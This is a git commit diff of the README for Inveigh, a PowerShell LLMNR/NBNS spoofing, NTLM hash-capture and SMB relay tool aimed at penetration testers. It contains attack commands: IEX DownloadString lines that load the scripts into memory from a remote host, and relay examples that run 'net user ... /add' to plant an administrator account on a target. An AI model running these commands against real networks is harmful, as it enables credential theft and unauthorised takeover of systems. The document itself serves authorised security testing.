aboutsummaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorKevin Robertson <robertsonk@gmail.com>2016-09-11 17:19:09 -0400
committerKevin Robertson <robertsonk@gmail.com>2016-09-11 17:19:09 -0400
commit377fe231183ab549aac43c42e3e8a44cfca6047f (patch)
tree846822cc55e6ac0a0eab5132f7d824b12e1e8b00
parent407f24c44870d614494e206b12a870c92e3e0a95 (diff)
downloadInveigh-377fe231183ab549aac43c42e3e8a44cfca6047f.tar.gz
Inveigh-377fe231183ab549aac43c42e3e8a44cfca6047f.zip
Another 1.2 update and new readme
Diffstat
-rw-r--r--README.md269
-rw-r--r--Scripts/Inveigh-Relay.ps1786
-rw-r--r--Scripts/Inveigh-Unprivileged.ps1973
-rw-r--r--Scripts/Inveigh.ps1894
4 files changed, 1385 insertions, 1537 deletions
diff --git a/README.md b/README.md
index 4ea179c..eebdf87 100644
--- a/README.md
+++ b/README.md
@@ -1,6 +1,33 @@
# Inveigh
Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool designed to assist penetration testers that find themselves limited to a Windows system.
+## Included In
+* PowerShell Empire - https://github.com/PowerShellEmpire/Empire
+* PS>Attack - https://github.com/jaredhaight/psattack
+* p0wnedShell - https://github.com/Cn33liz/p0wnedShell
+
+## Special Thanks
+* Anyone that posted .NET packet sniffing examples.
+* Responder - https://github.com/SpiderLabs/Responder
+* Impacket - https://github.com/CoreSecurity/impacket
+
+## Import
+* To import with Import-Module:
+ Import-Module ./Inveigh.psd1
+
+* To import using dot source method:
+ . ./Inveigh.ps1
+ . ./Inveigh-BruteForce.ps1
+ . ./Inveigh-Relay.ps1
+
+* To load into memory using Invoke-Expression:
+ IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1")
+ IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Unprivileged.ps1")
+ IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Relay.ps1")
+
+## System Requirements
+* Tested minimums are PowerShell 2.0 and .NET 3.5
+
## Functions
### Invoke-Inveigh
* The main Inveigh LLMNR/NBNS spoofer function.
@@ -8,6 +35,13 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
##### Privilege Requirements:
* Elevated Administrator or SYSTEM
+## Miscellaneous Notes
+* The local LLMNR/NBNS services do not need to be disabled on the host system.
+* LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind.
+* Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS.
+* Ensure that any needed LMMNR,NBNS,SMB,HTTP,HTTPS ports are open within any local firewall on the host system.
+* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns.
+
##### Features:
* IPv4 LLMNR/NBNS spoofer with granular control
* NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/SMB
@@ -20,58 +54,69 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
##### Notes:
* LLMNR/NBNS spoofing is performed by packet sniffing and responding through raw sockets.
* SMB challenge/response captures are performed by sniffing over the host system's SMB service.
+* The local LLMNR/NBNS services do not need to be disabled on the host system.
+* LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind.
+* Ensure that any needed LMMNR,NBNS,SMB,HTTP,HTTPS ports are open within any local firewall on the host system.
+* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns.
+
+##### Examples:
+* To execute with default settings:
+ Invoke-Inveigh
+
+* To load and execute with one line:
+ Import-Module ./Inveigh.ps1;Invoke-Inveigh
+
+* To execute with ConsoleOutput, FileOutput, and the NBNS spoofer enabled.
+ Invoke-Inveigh -ConsoleOutpuy Y -FileOutput Y -NBNS Y
+
+##### Screenshot:
+![inveigh](https://cloud.githubusercontent.com/assets/5897462/18420523/924f9c7a-7842-11e6-984e-153058b28016.png)
##### Parameters:
-* __IP__ - Specify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpooferIP' parameter is not set.
-* __SpooferIP__ - Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host.
+* __IP__ - Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpooferIP' parameter is not set.
+* __SpooferIP__ - IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host.
* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. Listed hostnames will override the whitelist created through SpooferLearning.
* __SpooferHostsIgnore__ - Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS.
* __SpooferIPsReply__ - Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS.
* __SpooferIPsIgnore__ - Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS.
* __SpooferLearning__ - Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the hostname to a spoofing blacklist.
-* __SpooferLearningDelay__ - (Interger) Set the amount of time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through SpooferLearning.
-* __SpooferLearningInterval__ - Default = 30 Minutes: (Interger) Set the amount of time in minutes that Inveigh wait before sending out a LLMNR/NBNS request for a hostname that has already been checked if SpooferLearning is enabled.
+* __SpooferLearningDelay__ - (Interger) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through SpooferLearning.
+* __SpooferLearningInterval__ - Default = 30 Minutes: (Interger) Time in minutes that Inveigh wait before sending out a LLMNR/NBNS request for a hostname that has already been checked if SpooferLearning is enabled.
* __SpooferRepeat__ - Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.
-* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing.
-* __LLMNRTTL__ - Default = 30 Seconds: Specify a custom LLMNR TTL in seconds for the response packet.
-* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofing.
-* __NBNSTTL__ - Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet.
+* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofer.
+* __LLMNRTTL__ - Default = 30 Seconds: LLMNR TTL in seconds for the response packet.
+* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofer.
+* __NBNSTTL__ - Default = 165 Seconds: NBNS TTL in seconds for the response packet.
* __NBNSTypes__ - Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
* __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
* __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the function does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store.
-* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016patches. A WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and connecting to the root of the web server.
-* __HTTPBasicRealm__ - Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
-* __HTTPDir__ - Specify a full directory path to enable hosting of basic content through the HTTP/HTTPS listener.
-* __HTTPDefaultFile__ - Specify a filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for wpad.dat requests.
-* __HTTPDefaultEXE__ - Specify an EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests.
-* __HTTPResponse__ - Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary.
-* __HTTPSCertAppID__ - Specify a valid application GUID for use with the ceriticate.
-* __HTTPSCertThumbprint__ - Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx.
-* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
+* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016patches. A WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and connecting to the root of the web server.
+* __HTTPBasicRealm__ - Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
+* __HTTPDir__ - Full directory path to enable hosting of basic content through the HTTP/HTTPS listener.
+* __HTTPDefaultFile__ - Filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for wpad.dat requests.
+* __HTTPDefaultEXE__ - EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests.
+* __HTTPResponse__ - String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary.
+* __HTTPSCertAppID__ - Valid application GUID for use with the ceriticate.
+* __HTTPSCertThumbprint__ - Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx.
+* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
* __WPADEmptyFile__ - Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when using WPADIP, WPADPort, or WPADResponse.
-* __WPADIP__ - Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.
-* __WPADPort__ - Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.
+* __WPADIP__ - Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.
+* __WPADPort__ - Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.
* __WPADDirectHosts__ - Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy.
-* __WPADResponse__ - Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary.
+* __WPADResponse__ - wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary.
* __SMB__ - Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to prevent login requests from being processed by the Inveigh host.
-* __Challenge__ - Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures.
-* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
-* __SMBRelay__ - Default = Disabled: (Y/N) Enable/Disable SMB relay. Note that Inveigh-Relay.ps1 must be loaded into memory.
-* __SMBRelayTarget__ - IP address of system to target for SMB relay.
-* __SMBRelayCommand__ - Command to execute on SMB relay target. Use PowerShell character escapes where necessary.
-* __SMBRelayUsernames__ - Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format.
-* __SMBRelayAutoDisable__ - Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target.
-* __SMBRelayNetworkTimeout__ - Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent.
+* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures.
+* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
* __ConsoleOutput__ - Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell.
-* __ConsoleStatus__ - Default = Disabled: (Integer) Set interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions.
+* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions.
* __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled.
* __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output.
* __FileUnique__ - Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time file output is enabled.
* __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
* __OutputStreamOnly__ - Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled.
-* __OutputDir__ - Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled.
+* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled.
* __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
-* __RunTime__ - Default = Unlimited: (Integer) Set the run time duration in minutes.
+* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes.
* __Inspect__ - (Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic.
* __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
@@ -93,48 +138,61 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
* Run time control
##### Notes:
+* The local NBNS service does not need to be disabled on the host system.
+* Ensure that any needed LMMNR,NBNS,HTTP ports are open within any local firewall on the host system.
+* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns.
* Microsoft released patches in June 2016 that will likely prevent some of this function's brute force features from working the way they did before June.
+##### Examples:
+* To execute with default settings:
+ Invoke-InveighUnprivileged
+
+* To execute with ConsoleOutput and FileOutput enabled and a run time of 30 minutes.
+ Invoke-InveighUnprivileged -ConsoleOutpuy Y -FileOutput Y -RunTime 30
+
+##### Screenshot:
+![inveigh-unprivileged](https://cloud.githubusercontent.com/assets/5897462/18420530/a6645a02-7842-11e6-8d2c-bd5ff04813fe.png)
+
##### Parameters:
-* __SpooferIP__ - Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Brute Force host.
-* __SpooferTarget__ - Specify an IP address to target for brute force NBNS spoofing.
+* __SpooferIP__ - IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Unprivileged host.
+* __SpooferTarget__ - IP address to target for brute force NBNS spoofing.
* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS.
* __SpooferHostsIgnore__ - Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS.
* __SpooferIPsReply__ - Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS.
* __SpooferIPsIgnore__ - Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS.
* __SpooferRepeat__ - Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.
-* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing.
-* __LLMNRTTL__ - Default = 30 Seconds: Specify a custom LLMNR TTL in seconds for the response packet.
-* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofing.
-* __NBNSTTL__ - Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet.
+* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofer.
+* __LLMNRTTL__ - Default = 30 Seconds: LLMNR TTL in seconds for the response packet.
+* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofer.
+* __NBNSTTL__ - Default = 165 Seconds: NBNS TTL in seconds for the response packet.
* __NBNSTypes__ - Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
-* __NBNSBruteForce__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofing.
-* __NBNSBruteForcePause__ Default = Disabled: (Integer) Specify the number of seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received.
-* __Hostname__ - Default = WPAD: Specify a hostname for NBNS spoofing.
+* __NBNSBruteForce__ - Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer.
+* __NBNSBruteForcePause__ Default = Disabled: (Integer) Time in seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received.
+* __Hostname__ - Default = WPAD: Hostname for NBNS bruteforce spoofer.
* __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
-* __HTTPIP__ - Default = Any: Specify a TCP IP address for the HTTP listener.
-* __HTTPPort__ - Default = 80: Specify a TCP port for the HTTP listener.
-* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016patches. A WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and connecting to the root of the web server.
-* __HTTPBasicRealm__ - Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. Use PowerShell character escapes where necessary.
-* __HTTPResponse__ - Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests.
-* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
+* __HTTPIP__ - Default = Any: IP address for the HTTP listener.
+* __HTTPPort__ - Default = 80: TCP port for the HTTP listener.
+* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016patches. A WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and connecting to the root of the web server.
+* __HTTPBasicRealm__ - Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. Use PowerShell character escapes where necessary.
+* __HTTPResponse__ - String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests.
+* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
* __WPADEmptyFile__ - Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when using WPADIP, WPADPort, or WPADResponse.
-* __WPADIP__ - Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.
-* __WPADPort__ - Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.
+* __WPADIP__ - Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.
+* __WPADPort__ - Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.
* __WPADDirectHosts__ - Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy.
-* __WPADResponse__ - Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary.
-* __Challenge__ - Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures.
+* __WPADResponse__ - wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary.
+* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures.
* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
-* __ConsoleStatus__ - Default = Disabled: (Integer) Set interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions.
+* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions.
* __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled.
* __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output.
* __FileUnique__ - Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time file output is enabled.
* __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
* __OutputStreamOnly__ - Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Brute Force through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled.
-* __OutputDir__ - Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled.
+* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled.
* __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
-* __RunCount__ - Default = Unlimited: (Integer) Set the number of captures to perform before auto-exiting.
-* __RunTime__ - Default = Unlimited: (Integer) Set the run time duration in minutes.
+* __RunCount__ - Default = Unlimited: (Integer) Number of captures to perform before auto-exiting.
+* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes.
* __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
### Invoke-InveighRelay
@@ -147,16 +205,27 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
* HTTP/HTTPS to SMB NTLMv2 relay with granular control
* NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS
* Granular control of console and file output
-* Can be executed as either a standalone function or through Invoke-Inveigh
+
+##### Examples:
+* To execute with basic options:
+ Invoke-Inveigh -HTTP N
+ Invoke-InveighRelay -SMBRelayTarget 192.168.1.50 -SMBRelayCommand "net user Inveigh Summer2016 /add && net localgroup administrators Inveigh /add"
+
+* To execute with and only perform SMB relay with the 'Administrator' account:
+ Invoke-InveighUnprivileged -HTTP N
+ Invoke-InveighRelay -SMBRelayTarget 192.168.1.50 -SMBRelayCommand "net user Inveigh Summer2016 /add && net localgroup administrators Inveigh /add" -SMBRelayUsernames Administrator
+
+##### Screenshot:
+![inveigh-relay](https://cloud.githubusercontent.com/assets/5897462/18420526/9991a758-7842-11e6-90b2-9d519ff03c28.png)
##### Parameters:
* __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
* __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the script does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store.
-* __HTTPSCertAppID__ - Specify a valid application GUID for use with the ceriticate.
-* __HTTPSCertThumbprint__ - Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx.
-* __Challenge__ - Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target.
+* __HTTPSCertAppID__ - Valid application GUID for use with the ceriticate.
+* __HTTPSCertThumbprint__ - Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx.
+* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target.
* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
-* __WPADAuth__ - Default = NTLM: (Anonymous,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
+* __WPADAuth__ - Default = NTLM: (Anonymous,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
* __SMBRelayTarget__ - IP address of system to target for SMB relay.
* __SMBRelayCommand__ - Command to execute on SMB relay target. Use PowerShell character escapes where necessary.
* __SMBRelayUsernames__ - Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format.
@@ -166,82 +235,20 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
* __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output.
* __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
* __OutputStreamOnly__ - Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled.
-* __OutputDir__ - Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled.
+* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled.
* __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
-* __RunTime__ - Default = Unlimited: (Integer) Set the run time duration in minutes.
+* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes.
* __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
+##### Notes:
+* Ensure that any needed HTTP,HTTPS ports are open within any local firewall on the host system.
+* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns.
+
### Support Functions
-* __Get-Inveigh__ - Get queued console output
-* __Get-InveighCleartext__ - Get all captured cleartext credentials
-* __Get-InveighLog__ - Get log entries
-* __Get-InveighNTLMv1__ - Get all or unique (-unique) captured NTLMv1 challenge/response hashes
-* __Get-InveighNTLMv2__ - Get all or unique (-unique) captured NTLMv2 challenge/response hashes
-* __Watch-Inveigh__ - Enable real time console output
* __Clear-Inveigh__ - Clear Inveigh data from memory
+* __Get-Inveigh__ - Get Inveigh data from memory - Parameters: Console, ClearText, CleartextUnique, Learning, Log, NTLMv1, NTLMv1Unique, NTLMv1Usernames, NTLMv2, NTLMv2Unique, NTLMv2Usernames
* __Stop-Inveigh__ - Stop all running Inveigh functions
+* __Watch-Inveigh__ - Enable real time console output
-## Miscellaneous Notes
-* The local LLMNR/NBNS services do not need to be disabled on the host system.
-* LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind.
-* Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS.
-* Ensure that any needed LMMNR,NBNS,SMB,HTTP,HTTPS ports are open within any local firewall on the host system.
-* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns.
-
-## System Requirements
-* Tested minimums are PowerShell 2.0 and .NET 3.5
-
-## Usage
-* To import with Import-Module:
- Import-Module ./Inveigh.psd1
-
-* To import using dot source method:
- . ./Inveigh.ps1
- . ./Inveigh-BruteForce.ps1
- . ./Inveigh-Relay.ps1
-
-* To load into memory using Invoke-Expression:
- IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1")
- IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Relay.ps1")
-
-## Examples
-* To execute with default settings:
- Invoke-Inveigh
-
-* To load and execute with one line:
- Import-Module ./Inveigh.ps1;Invoke-Inveigh
-
-* To execute with parameters (Use 'Get-Help -parameter * Invoke-Inveigh' for a full list of parameters):
- Invoke-Inveigh -IP 'local IP' -SpooferIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ConsoleOutput Y/N -FileOutput Y/N -OutputDir 'valid folder path'
-
-* To execute with SMB relay enabled through Invoke-Inveigh:
- Invoke-Inveigh -SMBRelay Y -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target"
-
-* To execute SMB relay with only Invoke-InveighRelay:
- Invoke-InveighRelay -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target"
-
-* To execute Inveigh-BruteForce against a target:
- Invoke-InveighRelay -SpooferTarget 'remote or local target IP'
-
-## Included In
-* PowerShell Empire - https://github.com/PowerShellEmpire/Empire
-* PS>Attack - https://github.com/jaredhaight/psattack
-* p0wnedShell - https://github.com/Cn33liz/p0wnedShell
-
-## Special Thanks
-* Anyone that posted .NET packet sniffing examples.
-* Responder - https://github.com/SpiderLabs/Responder
-* Impacket - https://github.com/CoreSecurity/impacket
-
-## Screenshots
-Invoke-Inveigh execution with real time console and file output enabled
-![inveighv1](https://cloud.githubusercontent.com/assets/5897462/12239354/4bb8a01a-b856-11e5-8a1e-5c0ebbb1ff35.PNG)
-
